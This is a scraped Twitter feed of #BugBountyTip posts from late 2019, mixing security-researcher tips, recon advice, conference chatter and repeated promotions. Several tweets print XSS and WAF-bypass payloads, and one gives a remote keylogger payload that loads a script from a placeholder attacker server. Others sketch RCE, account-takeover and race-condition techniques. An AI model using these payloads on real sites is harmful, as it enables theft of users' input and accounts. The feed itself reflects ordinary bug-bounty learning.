Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Noman | نعمان | नोमान
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ®
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇸🇾
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👁️
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what how Broken Link Hijacking? You can utilize this vulnerable to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇸🇾
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are 🔥🔥🔥 Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you🤘#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got to many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilá ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload with doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading 🥊🥊🔥🔥🔥
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu ❤️💓❤️ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇮🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSS´} «byPASS» payloads. @spyerror🎯 🥇 $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG… #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning 👥 Meet, connect and collaborate 💯 Give your absolute best always 🥳 Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ŞAHİN
@sametsahinnet


2019-10-31 05:44:47
